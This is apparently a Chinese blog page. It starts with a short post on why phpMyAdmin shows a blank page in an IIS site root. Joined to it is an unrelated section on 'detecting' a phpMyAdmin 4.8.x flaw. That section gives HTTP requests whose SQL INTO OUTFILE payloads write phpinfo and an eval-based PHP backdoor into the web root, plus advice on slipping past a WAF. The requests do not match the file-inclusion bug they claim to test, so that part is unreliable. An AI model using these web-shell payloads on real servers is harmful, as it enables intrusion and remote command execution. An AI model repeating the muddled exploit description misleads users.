phpmyadmin打开一片空白的原因?

本文记录了一次关于phpMyAdmin部署的问题排查过程,探讨了phpMyAdmin放置位置的影响及IIS配置注意事项。

折腾一整天,还以为环境配的不对呢,还重装了好几次系统,最后无意中另拷了一份phpmyadmin到phpmyadmin下,结果里面那个打开了,外面的打不开,这才发现原来phpmyadmin不能放到网站根目录或者直接用虚拟目录,可能是设置文件需要调一下,偶PHP不太懂,有空再仔细看看

刚刚在本地试了一下,直接放到根目录下,没有任何问题,然后打开了下服务器上的,发现个问题,根目录底下的要刷新好多次才能出来一次,而且样式表没有加载,而在子目录下的没有问题,打开一个文件看了下,包含文件是这样写的
require_once('./libraries/grab_globals.lib.php');
初步怀疑问题是不是出在"./"上呢?
想到本地的机子是XP的,于是又到另外几台系统是2003的服务器上试了下,根目录下也是空白,可能IIS里哪里需要设置一下吧?有空再研究研究

### 检测 phpMyAdmin 是否存在通杀漏洞的方法 检测 phpMyAdmin 是否存在通杀漏洞(如代码注入漏洞)通常需要结合自动化工具和手动验证手段。以下是一些关键的检测方法: #### 1. 版本识别 通过访问 phpMyAdmin 的登录页面或查看响应头信息,识别其版本号。若版本为 4.8.0 或 4.8.1,则可能存在该漏洞。可以通过如下方式识别: ```http GET /phpmyadmin/ HTTP/1.1 Host: target.com ``` 查看响应中的版本信息或页面底部的版本号,确认是否属于受影响版本 [^1]。 #### 2. 使用自动化漏洞扫描工具 可以借助自动化漏洞扫描工具(如 `sqlmap`、`Nuclei`、`Burp Suite` 等)检测 phpMyAdmin 是否存在代码注入漏洞。例如,使用 `Nuclei` 检测 phpMyAdmin 漏洞: ```bash nuclei -u http://target.com/phpmyadmin/ -t ~/nuclei-templates/http/cves/2018/CVE-2018-12613.yaml ``` 该模板专门用于检测 phpMyAdmin 4.8.0/4.8.1 的文件包含漏洞 [^1]。 #### 3. 手动构造恶意请求 通过构造特定的 HTTP 请求,尝试访问 `index.php` 并注入恶意代码。例如: ```http POST /phpmyadmin/index.php?db=malicious_db&table=malicious_table HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded Content-Length: length token=valid_token&lang=en&server=1 ``` 发送请求后,检查响应中是否包含异常行为,如 `phpinfo()` 输出或文件写入成功的信息 [^1]。 #### 4. 检查文件写入功能 利用漏洞尝试写入 Web Shell 到服务器。例如,构造如下请求: ```http POST /phpmyadmin/index.php?db=malicious_db&table=malicious_table HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded Content-Length: length token=valid_token&lang=en&server=1&target_lang=en&collation_connection=utf8mb4_unicode_ci&sql_query=SELECT%20%27%3C%3Fphp%20phpinfo%28%29%3B%20%3F%3E%27%20INTO%20OUTFILE%20%27/var/www/html/shell.php%27 ``` 如果服务器成功写入 `shell.php` 文件,并可通过浏览器访问,则表明漏洞存在 [^1]。 #### 5. 日志分析与行为监控 在测试过程中,应启用服务器日志记录,观察是否有异常请求或文件操作行为。例如,检查 Apache 或 Nginx 的访问日志是否包含可疑的 SQL 注入或文件写入请求 [^1]。 #### 6. 安全加固后的检测 若目标系统已进行安全加固(如升级版本、配置 WAF),可尝试绕过机制进行测试。例如,使用编码绕过 WAF 规则,构造如下请求: ```http POST /phpmyadmin/index.php?db=malicious_db&table=malicious_table HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded Content-Length: length token=valid_token&lang=en&server=1&target_lang=en&collation_connection=utf8mb4_unicode_ci&sql_query=SELECT%20%27%3C%3Fphp%20eval%28%24_POST%5B%27cmd%27%5D%29%3B%20%3F%3E%27%20INTO%20OUTFILE%20%27/var/www/html/backdoor.php%27 ``` 尝试访问 `backdoor.php` 并执行命令,验证是否被 WAF 拦截 。 --- ###
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值